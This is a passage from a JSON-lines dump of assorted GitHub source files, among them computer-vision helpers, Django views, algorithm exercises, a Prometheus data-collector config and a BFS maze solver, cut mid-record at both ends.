(model.np_bboxs[:, 3] - model.np_bboxs[:, 1] + 1)\n boxBArea = (bbox[2] - bbox[0] + 1) * \\\n (bbox[3] - bbox[1] + 1)\n iou = np.divide(interArea, (np.subtract(\n np.add(boxAArea, boxBArea), interArea)))\n b = np.zeros_like(iou)\n\n arg_best_match = np.argmax(iou, axis=0)\n if iou[arg_best_match] != 0:\n b[arg_best_match] = 1\n target_vector += b\n\n return target_vector","repo_name":"arturfabricio/aircraft-detection","sub_path":"src/training_utilities.py","file_name":"training_utilities.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"73925794081","text":"import cv2 as cv\r\n\r\n\r\nclass Camera:\r\n\r\n\r\n def __init__(self):\r\n self.camera = cv.VideoCapture(0, cv.CAP_DSHOW)\r\n self.roi_color = 0\r\n\r\n if not self.camera.isOpened():\r\n raise ValueError(\"Unable to Open Camera!\")\r\n\r\n self.width = self.camera.get(cv.CAP_PROP_FRAME_WIDTH)\r\n self.height = self.camera.get(cv.CAP_PROP_FRAME_HEIGHT)\r\n\r\n def __del__(self):\r\n if self.camera.isOpened():\r\n self.camera.release()\r\n\r\n def get_frame(self):\r\n if self.camera.isOpened():\r\n ret, image = self.camera.read()\r\n image_gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)\r\n self.face_cascade = cv.CascadeClassifier(\"E:/Face Mask Detection/haarcascade_frontalface_default.xml\")\r\n self.faces = self.face_cascade.detectMultiScale(image_gray, scaleFactor=1.1, minNeighbors=5,\r\n minSize=(30, 30), flags=cv.CASCADE_SCALE_IMAGE)\r\n for (x, y, w, h) in self.faces:\r\n cv.rectangle(image, (x, y), (x + w, y + h), (0, 255, 0), 2)\r\n self.roi_color = image[y:y + h, x:x + w]\r\n cv.imwrite('frame.jpg', self.roi_color)\r\n\r\n\r\n\r\n if ret:\r\n return (ret, cv.cvtColor(image, cv.COLOR_BGR2RGB))\r\n else:\r\n return (ret, None)\r\n else:\r\n return None","repo_name":"Ashu-4638/Face-Mask-Detection","sub_path":"Camera.py","file_name":"Camera.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"23363213671","text":"from django.shortcuts import render\nfrom mywatchlist.models import BarangMywatchlist\nfrom django.http import HttpResponse\nfrom django.core import serializers\n\ndef show_mywatchlist_html(request):\n data_barang_mywatchlist = BarangMywatchlist.objects.all()\n\n done = 0\n size = 0\n message = \"Wah, kamu masih sedikit menonton!\"\n for data in data_barang_mywatchlist:\n size += 1\n if (data.watched == True):\n done += 1\n\n not_done = size - done\n if (done >= not_done):\n message = \"Selamat, kamu sudah banyak menonton!\"\n\n context = {\n \"nama\" : \"Amanda Nurul Izzah\",\n \"student_id\" : \"2106634080\",\n \"list_barang\" : data_barang_mywatchlist,\n \"message\" : message\n }\n\n return render(request, \"mywatchlist.html\", context)\n\ndef show_mywatchlist_json(request):\n data = BarangMywatchlist.objects.all()\n return HttpResponse(serializers.serialize(\"json\", data), content_type=\"application/json\")\n\ndef show_mywatchlist_xml(request):\n data = BarangMywatchlist.objects.all()\n return HttpResponse(serializers.serialize(\"xml\", data), content_type=\"application/xml\")\n","repo_name":"amrul-hzz/tugas-pbp","sub_path":"mywatchlist/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"41210118202","text":"import numpy as np\r\nimport random\r\nimport statistics as stat\r\n\r\nrandom.seed(0)\r\n\r\nprint(\"Part b\")\r\nH = []\r\nfor i in range(1,6):\r\n r = [1 / (i + j - 1) for j in range(1,6)]\r\n H.append(r)\r\nH = np.array(H)\r\n\r\nprint(\"Hilbert Matrix\")\r\nfor r in H:\r\n print(str(r))\r\n\r\n# Part c\r\nU , S , VT = np.linalg.svd(H)\r\n\r\nprint(\"\\nPart d\")\r\nk2 = max(S) / min(S)\r\nprint(\"k2: \" + str(k2))\r\n\r\n# Part e\r\ndef randomUnitVector():\r\n v = np.array([random.randrange(-100000 , 100000) for i in range(5)])\r\n return [x / np.linalg.norm(v) for x in v]\r\n\r\ndef getKxy(x , y , H):\r\n return np.linalg.norm((H @ y)) / np.linalg.norm((H @ x))\r\n\r\ndef partE(H):\r\n K = []\r\n for i in range(10):\r\n x = np.array(randomUnitVector())\r\n y = np.array(randomUnitVector())\r\n K.append(getKxy(x , y , H))\r\n return max(K) , min(K) , stat.mean(K) , stat.stdev(K)\r\n\r\nprint(\"\\nPart e\")\r\nlab = [\"Max: \" , \"Min: \" , \"Mean: \" , \"SD: \"]\r\ndat = partE(H)\r\nfor i in range(4):\r\n print(lab[i] + str(dat[i]))\r\n\r\nprint(\"\\nPart f\")\r\nk = getKxy(VT[4] , VT[0] , H)\r\nprint(\"K(v_5 , v_1): \" + str(k))","repo_name":"lVicholas/Class_Code","sub_path":"Linear_Algebra_for_Data_Science/MAS4115.HW7.py","file_name":"MAS4115.HW7.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36953219966","text":"# https://leetcode-cn.com/problems/best-time-to-buy-and-sell-stock-iii/submissions/\n\nclass Solution:\n def maxProfit(self, prices: List[int]) -> int:\n length = len(prices)\n if len(prices) == 0:\n return 0\n\n dp = [[0] * 4 for _ in range(length)]\n dp[0][0] = -prices[0]\n dp[0][2] = -prices[0]\n\n for i in range(1, length):\n dp[i][0] = max(dp[i - 1][0], -prices[i])\n dp[i][1] = max(dp[i - 1][1], dp[i - 1][0] + prices[i])\n dp[i][2] = max(dp[i - 1][2], dp[i - 1][1] - prices[i])\n dp[i][3] = max(dp[i - 1][3], dp[i - 1][2] + prices[i])\n\n return dp[-1][3]\n","repo_name":"AlfredTheBest/leetcode","sub_path":"examples/dynamic-programming/stock/123-best-time-to-uy-and-sell-stock-iii.py","file_name":"123-best-time-to-uy-and-sell-stock-iii.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28021946662","text":"from .GenericTask import GenericTask\nfrom apps.helpers.HttpRequest import HttpRequest, HttpMockBackend\nfrom requests.exceptions import HTTPError\nfrom django.conf import settings\n\n\nclass HttpPingTask(GenericTask):\n\n def __init__(self, task=None):\n super(HttpPingTask, self).__init__(task=task)\n if task.get('url') is None:\n raise Exception('url must be set for http_ping')\n\n if self.task.get('ok_resp') is not None and isinstance(self.task['ok_resp'], list):\n self.ok_resp = self.task['ok_resp']\n else:\n self.ok_resp = [200, 301]\n\n def run(self):\n super(HttpPingTask, self).run()\n resp_code = None\n try:\n if settings.TESTING:\n requests = HttpRequest(backend=HttpMockBackend())\n response = requests.get(url=self.task['url'], allow_redirects=False, timeout=self.task.get('timeout'))\n resp_code = response.status_code\n self.timings = (0, 0, int(response.elapsed.total_seconds() * 1000))\n response.raise_for_status()\n except HTTPError as http_err:\n return False, resp_code, str(http_err), self.timings\n except Exception as err:\n return False, resp_code, str(err), self.timings\n else:\n return self.ok_resp.count(resp_code) > 0, resp_code, 'Open {}: {} in {} = {}; total {}s'.format(\n self.task['url'], resp_code, str(self.ok_resp),\n str(self.ok_resp.count(resp_code) > 0), self.timings[2]/1000\n ), self.timings\n","repo_name":"utking/uptime_monitor","sub_path":"apps/helpers/HttpPingTask.py","file_name":"HttpPingTask.py","file_ext":"py","file_size_in_byte":1558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"70911360163","text":"import os\nimport re\n\nimport torch\n\nfrom src.data.gnn.utils import prepare_files\n\ngnn_number_pattern = re.compile(r\"-n[0-9]+-\")\n\n# remove gnns that do not reach perfect training\n\npath = \"./data/gnns_v4/\"\nlog_file = \"formulas_v4.json.5.log\"\nmodel_hash = \"40e65407aa\"\n\nformula_path = os.path.join(path, model_hash)\ncleaned_path = os.path.join(formula_path, \"cleaned\")\nos.makedirs(cleaned_path, exist_ok=True)\n\nformula_hash_to_file = prepare_files(path=formula_path)\n\ncurrent_formula_hash = None\ncurrent_formulas = []\ncurrent_gnn_index = 0\ncleaned_formulas = []\n\nmax_iteration_reached = False\n\nskip_hashes = set()\n\nwith open(os.path.join(path, \"logs\", log_file)) as f:\n for line in f:\n _current_formula_hash = line[:10]\n if _current_formula_hash in skip_hashes:\n continue\n if current_formula_hash != _current_formula_hash:\n if current_formula_hash is not None:\n # save what we have and reset\n current_file = formula_hash_to_file[current_formula_hash]\n number_pattern = gnn_number_pattern.search(current_file)[0]\n formula_file_cleaned = current_file.replace(\n number_pattern, f\"-n{str(len(cleaned_formulas))}-\"\n )\n\n print(f\"saving formula {current_formula_hash}\")\n torch.save(\n cleaned_formulas, os.path.join(cleaned_path, formula_file_cleaned)\n )\n\n cleaned_formulas = []\n current_gnn_index = 0\n\n if _current_formula_hash not in formula_hash_to_file:\n print(f\"Skiping hash {_current_formula_hash}\")\n skip_hashes.add(_current_formula_hash)\n current_formula_hash = None\n continue\n\n current_formula_hash = _current_formula_hash\n formula_file = formula_hash_to_file[current_formula_hash]\n current_formulas = torch.load(os.path.join(formula_path, formula_file))\n\n if \"Training model\" in line:\n current_gnn_index = int(line.split(\"Training model \")[1].split(\"/\")[0]) - 1\n max_iteration_reached = False\n\n # hardcoded max 15 iterations\n # no need to check for macro/micro, it should have ended before\n # if it had had reached the expected result.\n # also, INFO 15 is still allowed if DEBUG 15 does not exist\n # this also avoids the change on avg precision\n if \"\"\"src.run_logic DEBUG \" 15\"\"\" in line:\n max_iteration_reached = True\n\n # basically if DEBUG 15 exists, then the trainig stopped for iteration limit\n # no for condition check\n if \"\"\"src.run_logic INFO\"\"\" in line and not max_iteration_reached:\n print(f\"Adding gnn {current_gnn_index} - on hash {current_formula_hash}\")\n cleaned_formulas.append(current_formulas[current_gnn_index])\n\n max_iteration_reached = False\n\n if cleaned_formulas and current_formula_hash is not None:\n # when finished, save what is left\n current_file = formula_hash_to_file[current_formula_hash]\n number_pattern = gnn_number_pattern.search(current_file)[0]\n formula_file_cleaned = current_file.replace(\n number_pattern, f\"-n{str(len(cleaned_formulas))}-\"\n )\n\n print(f\"saving formula {current_formula_hash}\")\n torch.save(cleaned_formulas, os.path.join(cleaned_path, formula_file_cleaned))\n","repo_name":"juanpablos/GNN-explain","sub_path":"_clean_networks.py","file_name":"_clean_networks.py","file_ext":"py","file_size_in_byte":3443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18088677745","text":"# faz a solicitação de número inteiro dentro do while\n# verifica se é maior que zero (se for, imprime na tela o que ele é e peda mais números)\n# identifica se é zero ou maior que zero e faz a mesma coisa do passo anterior\n# garantir que o usuário digitará 10 números\n\ni = 0\n\nwhile i < 10:\n num = float(input('Digite um número inteiro: '))\n numt = int(num // 1)\n if numt < 0:\n print('Número é menor que zero')\n elif numt == 0:\n print('Número é zero')\n elif numt > 0:\n print('Número é positivo')\n i += 1","repo_name":"GalegoSonolento/Exercicios_Algorit_Prog_Fund_Unisinos","sub_path":"Aula 7/Fixação while 2/ex01.py","file_name":"ex01.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24023436383","text":"from setuptools import setup, find_packages\nimport sys, os\n\nversion = '1.2'\n\nsetup(name='StockTrader',\n version=version,\n description=\"It helps one know the value of their stock\",\n long_description=\"\"\"\\\nThis application lets you know the value of your stock in an instant, without having to surf the net and going through links with umpteen ads. It also shows you current situation of the market! It also gives updates as to how much it has increased/decreased in that day. More updates coming soon, will give more features.\"\"\",\n classifiers=[], # Get strings from http://pypi.python.org/pypi?%3Aaction=list_classifiers\n keywords='stock stocktrader bse nse market bear bearish bull bullish profit loss share shares stocks price value',\n author='Madhur Adlakha',\n author_email='madhuradlakha@yahoo.co.in',\n url='www.madhuradlakha.com',\n license='NA',\n packages=find_packages(exclude=['ez_setup', 'examples', 'tests']),\n include_package_data=True,\n zip_safe=True,\n install_requires=[\n # -*- Extra requirements: -*-\n ],\n entry_points=\"\"\"\n # -*- Entry points: -*-\n \"\"\",\n )\n","repo_name":"madhuradlakha/stocktrader","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"35378779114","text":"#!/usr/bin/python\n'''\n\n For piping between bedSeq program from Python scripts\n\n'''\n\ndef toStrArray(L):\n\tL2=[]\n\tfor x in L:\n\t\tL2.append(str(x))\n\t\n\treturn L2\n\n\nfrom subprocess import *\n\nfrom sys import *\n\ndefaultBedSeqCommand=[\"bedSeq\",\"\",\"/dev/stdin\",\"bed\"]\n\nclass BedSeqClient:\n\tchild_stdin=None\n\tchild_stderr=None\n\tchild_stdout=None\n\tdef __init__(self,seqDir,bedType,extraParams=None,bedSeqProgramName='bedSeq',inputFileName='/dev/stdin'):\n\t\tparam=[bedSeqProgramName,seqDir,inputFileName,bedType,\"--print-OK\"]\n\t\tif extraParams:\n\t\t\tparam.extend(extraParams)\n\t\t\t\t\t\n\t\tp=Popen(\" \".join(param), shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE, close_fds=True)\n\t\t(self.child_stdin,self.child_stdout,self.child_stderr)=(p.stdin,p.stdout,p.stderr)\n\t\n\tdef getBedSeq(self,bedentry):\n\t\tif type(bedentry).__name__==\"list\":\n\t\t\tbedentry=\"\\t\".join(toStrArray(bedentry))\n\t\t\n\t\tprint >> self.child_stdin,bedentry\n\t\t\n\t\terror=self.child_stderr.readline().strip()\n\t\t\n\t\tif error==\"OK\":\n\t\t\tresult=self.child_stdout.readline().strip()\n\t\t\treturn result\n\t\telse:\n\t\t\traise ValueError\n\t\t\t\n\tdef getSeq(self,bedentry):\n\t\tresult=self.getBedSeq(bedentry)\n\t\tfields=result.split(\"\\t\")\n\t\treturn fields[-1]\n\t\t\t\n\tdef close(self):\n\t\tself.child_stdin.close()\n\t\tself.child_stdout.close()\n\t\tself.child_stderr.close()\n\t\t\t\n\n\nif __name__=='__main__':\n\tprogramName=argv[0]\n\targs=argv[1:]\n\ttry:\n\t\tseqDir,=args\n\texcept:\n\t\tprint >> stderr,programName,\"seqDir\",\"> ofile\"\n\t\texit()\n\t\n\ttries=[\"chr10\\t100225000\\t100225200\",\"chr\",\"chr12\\t11125235\\t11125256\"]\n\tbedSeqClient=BedSeqClient(seqDir,\"bed\")\n\tfor tri in tries:\n\t\ttry:\n\t\t\tprint >> stdout,bedSeqClient.getBedSeq(tri)\n\t\texcept:\n\t\t\tpass\n\tbedSeqClient.close()\n\t","repo_name":"albertwcheng/bedSeq","sub_path":"BedSeqUtil.py","file_name":"BedSeqUtil.py","file_ext":"py","file_size_in_byte":1663,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"2319252145","text":"from utils import move\n\n\ndef next_move(L, C, i, j, l):\n n = len(L)\n n_minus1 = n - 1\n # compute the constituent kernel for search status\n # as the incumbent combined kenerl\n\n if (n_minus1 * i + j >= n_minus1 * l):\n idx_l = L.index(l)\n (next_i, next_j) = (idx_l, idx_l + 1)\n elif (j < n_minus1):\n (next_i, next_j) = (i, j + 1)\n else:\n (next_i, next_j) = (i + 1, i + 2)\n print(\"Constituent Kernel\", next_i, \"->\", next_j, \"for statuts (\", i, j, l, \")\")\n # compute constituent kernel for every conflict\n for c in C:\n (cons_i, cons_j) = (n_minus1, n_minus1 + 1)\n for (a, b) in c:\n (idx_a, idx_b) = (L.index(a), L.index(b))\n # break if the conflict is resolved by the incumbent combined kernel\n if (a <= l) and (n * idx_a + idx_b) <= (n * next_i + next_j):\n (cons_i, cons_j) = (0, 0)\n break\n # update the constituent kernel\n if (a <= l) and (n * idx_a + idx_b) < (n * cons_i + cons_j):\n (cons_i, cons_j) = (idx_a, idx_b)\n print(\"Constituent Kernel\", cons_i, \"->\", cons_j, \"for conflict\", c)\n # break when a unsolvable conflict is detected\n if cons_i > l: return (n_minus1, n_minus1 + 1)\n # update the combined kernel\n if (n * next_i + next_j) < (n * cons_i + cons_j):\n (next_i, next_j) = (cons_i, cons_j)\n # print(\"Combined Kernel:\", next_i, \"->\", next_j)\n return (next_i, next_j)\n\n\ndef phi_consistent(L, Phi):\n for phi in Phi:\n phi_consistent = False\n for (a, b) in phi:\n (idx_a, idx_b) = (L.index(a), L.index(b))\n if idx_a < idx_b:\n phi_consistent = True\n break\n if not phi_consistent:\n # print(\"Inconsistent! Violate \", phi)\n return False\n # print(\"Phi Consistent!\")\n return True\n\n\ndef phi_conflicts(L, Phi):\n C = []\n for phi in Phi:\n c = []\n for (a, b) in phi:\n (idx_a, idx_b) = (L.index(a), L.index(b))\n c.append((b, a))\n if idx_a < idx_b:\n c = []\n break\n # print(\"Conflict:\", c, \"for \", phi)\n if c: C.append(c)\n print(\"Conflict:\", C)\n return C\n\n\ndef conflicts2clauses(C):\n Phi = []\n for c in C:\n phi = []\n for (a, b) in c:\n phi.append((b, a))\n Phi.append(phi)\n return Phi\n\n\ndef cdito(L, P, Phi, h):\n n_minus1 = len(L) - 1\n times = 0\n while P and times < 100:\n times = times + 1\n print(\"\\n\")\n print(\"#\", times)\n print(\"L =\", L)\n print(\"P =\", P)\n # print(\"Phi = \", Phi)\n if phi_consistent(L, Phi):\n (h_consistent, Ch) = h(L)\n if h_consistent:\n print(\"Solution Found\")\n return L\n else:\n Phi = Phi + conflicts2clauses(Ch)\n (i, j, l) = P[-1]\n C = phi_conflicts(L, Phi)\n (next_i, next_j) = next_move(L, C, i, j, l)\n print(\"Combined Kernel:\", next_i, \"->\", next_j)\n if next_i < l:\n L = move(L, next_i, next_j)\n P[-1] = (next_i, next_j, l)\n P.append((0, 0, next_i))\n print(\"[Type 1] Move to\", L)\n else:\n P.pop()\n if P:\n (parent_i, parent_j, parent_l) = P[-1]\n L = move(L, parent_j, parent_i - 1)\n print(\"Backtrack to\", L, \"by taking\", \"(\" + repr(parent_j) + \" ,\" + repr(parent_i - 1) + \")\")\n if l < next_i < n_minus1:\n print(\"[Type 2] Update Parent's Status for Moving to a Sibling\")\n P[-1] = (parent_i, next_j - 1, parent_l)\n if next_i == n_minus1:\n print(\"[Type 3] Update Parent's Status for Pruning\")\n P[-1] = (parent_i + 1, parent_i + 1, parent_l)\n print(\"No Solution!\")\n return []","repo_name":"jkchengh/CDITO","sub_path":"cdito.py","file_name":"cdito.py","file_ext":"py","file_size_in_byte":3950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36433998928","text":"class PriorityQueueSlow:\n def __init__(self):\n self.data = []\n self.size = 0\n \n\n def insert(self, value):\n self.data.append(value)\n self.size += 1\n \n def extract_min(self):\n if self.size == 0:\n return None\n\n cur_min = self.data[0]\n cur_min_loc = 0\n for i in range(1, self.size):\n if self.data[i] < cur_min:\n cur_min = self.data[i]\n cur_min_loc = i\n\n del self.data[cur_min_loc]\n self.size -= 1\n return cur_min","repo_name":"Youssef-Rachad/ESC180_ESC190_notes","sub_path":"esc190/data_structures/pq_slow.py","file_name":"pq_slow.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19505484602","text":"# class Vehicle:\n#\n# # colour = \"White\"\n#\n# def __init__(self, name, max_speed, mileage, colour=\"White\", capacity):\n# self.name = name\n# self.max_speed = max_speed\n# self.mileage = mileage\n# self.colour = colour\n# self.capacity = capacity\n#\n# def print(self):\n# print(f\"Colour: {self.colour}, Vehicle Name: {self.name}, Speed: {self.max_speed}, Mileage: {self.mileage}\")\n#\n# def seating_capacity(self, capacity):\n# return f\"The seating capacity of a {self.name} is {capacity} passengers.\"\n#\n# def fare(self):\n# return self.capacity * 100\n#\n#\n# class Bus(Vehicle):\n# # def print(self):\n# # print(f\"Vehicle Name: {self.name} Speed: {self.max_speed} Mileage: {self.mileage}\")\n# def seating_capacity(self, capacity=50):\n# return super().seating_capacity(capacity)\n#\n# def fare(self, capacity=50):\n# return self.capacity * 100\n#\n# class Car(Vehicle):\n# pass\n#\n#\n# School = Bus(\"School Volvo\", 180, 12, \"White\", 50)\n# Audi_Q5 = Car(\"Audi Q5\", 240, 18, \"\", 4)\n# School.print()\n# Audi_Q5.print()\n# print(School.seating_capacity())\n\nclass Vehicle:\n def __init__(self, name, mileage, capacity):\n self.name = name\n self.mileage = mileage\n self.capacity = capacity\n\n def fare(self):\n return self.capacity * 100\n\n\nclass Bus(Vehicle):\n def fare(self):\n # return self.capacity * 100 * 1.1\n amount = super().fare()\n amount += amount * 10 / 100\n return amount\n\n\nSchool_bus = Bus(\"School Volvo\", 12, 50)\nprint(\"Total Bus fare is:\", School_bus.fare())\nprint(type(School_bus))\nprint(isinstance(School_bus, Vehicle))\n","repo_name":"yfp-c/eng103a-python","sub_path":"Classes_Practice/practice_4_vehicle.py","file_name":"practice_4_vehicle.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"23512686081","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\n\nfrom pyecs import *\nfrom pycompupipe.components import PygameSurface, BlitSurface, GuiElement\n\nimport mock\nimport pygame\n\nfrom testing import *\n\nclass TestBlitSurface():\n\n @mock.patch(\"pycompupipe.components.pygame_components.blit_surface.BlitSurface.draw\")\n def test_event(self, mocked_draw):\n e = Entity()\n s = e.add_component(PygameSurface((10,10)))\n d = e.add_component(BlitSurface(\"draw\",10))\n screen = mock.NonCallableMock()\n e.fire_callbacks(\"draw\", screen)\n mocked_draw.assert_called_once_with(screen)\n\n def test_draw(self):\n size = (100,100)\n size2 = (100,50)\n \n screen = pygame.Surface(size)\n\n screen.fill((0,0,0))\n\n e = Entity()\n s = e.add_component(PygameSurface(size2))\n d = e.add_component(BlitSurface(\"draw\"))\n\n s.surface.fill((255,255,255))\n d.draw(screen)\n\n assert (pygame.surfarray.pixels3d(screen)[:size2[0],:size2[1]] == (255,255,255)).all()\n assert (pygame.surfarray.pixels3d(screen)[:size2[0],size2[1]:] == (0,0,0)).all()\n\n \n @forEach(\"x\",lambda:iter([0,50,80]))\n @forEach(\"y\",lambda:iter([0,50,80]))\n def test_draw_xy(self, x, y):\n size = (100,100)\n size2 = (1,1)\n \n screen = pygame.Surface(size)\n\n screen.fill((0,0,0))\n\n e = Entity()\n s = e.add_component(PygameSurface(size2))\n g = e.add_component(GuiElement((x,y)))\n d = e.add_component(BlitSurface(\"draw\"))\n\n s.surface.fill((255,255,255))\n d.draw(screen)\n\n assert (pygame.surfarray.pixels3d(screen)[x,y] == (255,255,255)).all()\n\n def test_str(self):\n d = BlitSurface(\"draw\")\n assert str(d) == \"BlitSurface(draw)\"\n ","repo_name":"xaedes/PyCompuPipe","sub_path":"tests/components/pygame_components/test_blit_surface.py","file_name":"test_blit_surface.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36285769101","text":"\"\"\"\nThis file contains utility functions for configuring the IsiDataInsightsDaemon\nvia command line args and config file.\n\"\"\"\nimport argparse\nimport configparser\nimport getpass\nimport logging\nimport os\nimport re\nimport sys\nimport urllib3\n\nfrom ast import literal_eval\n\nLOG = logging.getLogger(__name__)\nDEFAULT_LOG_FILE = \"./data_collectors.log\"\nDEFAULT_LOG_LEVEL = \"INFO\"\n\ndef _log_level_str_to_enum(log_level):\n if log_level.upper() == \"DEBUG\":\n return logging.DEBUG\n elif log_level.upper() == \"INFO\":\n return logging.INFO\n elif log_level.upper() == \"WARNING\":\n return logging.WARNING\n elif log_level.upper() == \"ERROR\":\n return logging.ERROR\n elif log_level.upper() == \"CRITICAL\":\n return logging.CRITICAL\n else:\n print(\"Invalid logging level: {}, setting to INFO.\".format(log_level))\n return logging.INFO\n\ndef parse_cli():\n \"\"\"\n Setup the command line args and parse them.\n \"\"\"\n argparser = argparse.ArgumentParser(description='Starts Isilon Data Collector Process.')\n argparser._action_groups.pop()\n required = argparser.add_argument_group('Required arguments')\n optional = argparser.add_argument_group('Optional arguments')\n required.add_argument('--host', help=\"Specifies promotheus host ip or name\")\n optional.add_argument('--path', help=\"Specifies directory to save output\", nargs='?', const='./', default='./')\n required.add_argument('--metric', help=\"Specifies metric name\")\n optional.add_argument('--start', help=\"Specifies query start time\")\n optional.add_argument('--end', help=\"Specifies query end time\")\n optional.add_argument('--time', help=\"Specifies query time\")\n optional.add_argument('--query', help=\"Specifies query type\")\n optional.add_argument('--time_range', help=\"Specifies time range in seconds\")\n optional.add_argument('--func', help=\"Specifies fucntion to apply on metric\")\n #optional.add_argument('--prometheus_user', help=\"Specifies Prometheus username\")\n #optional.add_argument('--prometheus_passwd', help=\"Specifies prometheus user password\")\n #optional.add_argument('--config', help=\"Specifies All configurations\", nargs='?', const='config.json', default='config.json')\n #optional.add_argument('--isilon_ssl', help=\"Specifies whether SSL verification should be done on Isilon host. Default value is n \", nargs='?', const='n', default='n')\n #required.add_argument('--isilon_stats', help=\"Specifies Statistics to retrieve from Isilon host. valid values are {0}\".format(STATS_NAME.keys()) )\n #required.add_argument('--influx_host', help=\"Specifies InfluxDB host ip. Default value is localhost.\", nargs='?', const='localhost', default='localhost')\n #optional.add_argument('--influx_port', help=\"Specifies InfluxDB port. Default value is 8086.\", nargs='?', const='8086', default='8086')\n #required.add_argument('--influx_db', help=\"Specifies InfluxDB database to use. If it does no exsist, it will be created.\")\n #optional.add_argument('--influx_user', help=\"Set the path to the daemon pid file. The default value is root.\")\n #optional.add_argument('--influx_passwd', help=\"Set the path to the daemon pid file. The default value is root.\")\n\n optional.add_argument('--log_file', help=\"Set the path to the log file. The default value is %s\" % DEFAULT_LOG_FILE, nargs='?', const=DEFAULT_LOG_FILE, default=DEFAULT_LOG_FILE)\n optional.add_argument('--log_level', help=\"Set the log level. The default value is INFO\", nargs='?', const='INFO', default=DEFAULT_LOG_LEVEL)\n\n return argparser.parse_args()\n\ndef configure_process(daemon, args):\n \"\"\"\n Configure the daemon's stat groups and the stats processor via command line\n arguments.\n \"\"\"\n daemon.set_host(args.host)\n daemon.set_path(args.path)\n daemon.set_metric(args.metric)\n #_configure_prometheus_client(daemon, args)\n #_configure_metric_names(daemon, args)\n #_print_stat_groups(daemon)\n\ndef _configure_prometheus_client(daemon, args):\n \"\"\"\n Configure the daemon's stat prometheus client\n \"\"\"\n params = {}\n params['start_time'] = args.start\n params['end_time'] = args.end\n params['time'] = args.time\n params['time_range'] = args.time_range\n params['function'] = args.func\n daemon.set_host(args.host)\n daemon.set_query(args.query)\n daemon.set_metric(args.metric)\n demon.set_parameters(params)\n LOG.info(\"Collecting data from Prometheus Host %s \" % args.host)\n\ndef _configure_metric_names(daemon, args):\n \"\"\"\n Configure the daemon's stat name\n \"\"\"\n if args.metric is None:\n print >> sys.stderr, \"You must provide metric to query via the --metric command line argument.\"\n sys.exit(1)\n daemon.set_metric_name(args.metric)\n\ndef configure_logging_via_cli(args):\n \"\"\"\n Setup the logging from command line args.\n \"\"\"\n if args.log_file is None:\n args.log_file = DEFAULT_LOG_FILE\n\n parent_dir = os.path.dirname(args.log_file)\n if parent_dir and os.path.exists(parent_dir) is False:\n print(\"Invalid log file path: {}.\".format(args.log_file))\n sys.exit(1)\n\n if args.log_level is None:\n args.log_level = DEFAULT_LOG_LEVEL\n\n log_level = _log_level_str_to_enum(args.log_level)\n logging.basicConfig(filename=args.log_file, level=log_level, format='%(asctime)s:%(name)s:%(levelname)s: %(message)s')\n console = logging.StreamHandler()\n console.setLevel(logging.DEBUG)\n # set a format which is simpler for console use\n formatter = logging.Formatter('%(asctime)s:%(name)s:%(levelname)s: %(message)s')\n console.setFormatter(formatter)\n # add the handler to the root logger\n logging.getLogger('').addHandler(console)\n LOG.info(\"Logging Data collectors in file %s\" % args.log_file)\n\ndef read_config(options):\n \"\"\"\n reading configuration file\n \"\"\"\n configuration = dict()\n","repo_name":"cnleng/prometheus_data_collector","sub_path":"data_collectors_config.py","file_name":"data_collectors_config.py","file_ext":"py","file_size_in_byte":5871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73415254241","text":"\"\"\"\n\nbfs로 탐색을 하면서 벽을 부순 횟수를 최소화 하면 된다.\ncrash[i][j]: (i, j)에 도착할 때까지 벽을 부순 최소 횟수\n\n\"\"\"\nimport sys\nfrom collections import deque\n\ninput = sys.stdin.readline\n\nM, N = map(int, input().rstrip(\"\\n\").split(\" \"))\nmaze = [list(map(int, input().rstrip(\"\\n\"))) for _ in range(N)]\ncrash = [[sys.maxsize for _ in range(M)] for _ in range(N)] # 벽을 부순 횟수 저장\n\ndx = [0, 0, -1, 1] # x좌표 이동\ndy = [-1, 1, 0, 0] # y좌표 이동\n\n\ndef bfs(x, y):\n queue = deque()\n queue.append([x, y])\n crash[y][x] = 0\n\n while queue:\n cur_x, cur_y = queue.popleft()\n for i in range(4):\n nx = cur_x + dx[i]\n ny = cur_y + dy[i]\n if (0 <= nx) and (nx < M) and (0 <= ny) and (ny < N):\n if maze[ny][nx] == 0: # 벽이 없으면 부수지 않고 이동 가능\n if crash[ny][nx] > crash[cur_y][cur_x]:\n crash[ny][nx] = crash[cur_y][cur_x]\n queue.append([nx, ny])\n else: # 벽이���면 부수고 이동 가능 (부순 횟수 +1)\n if 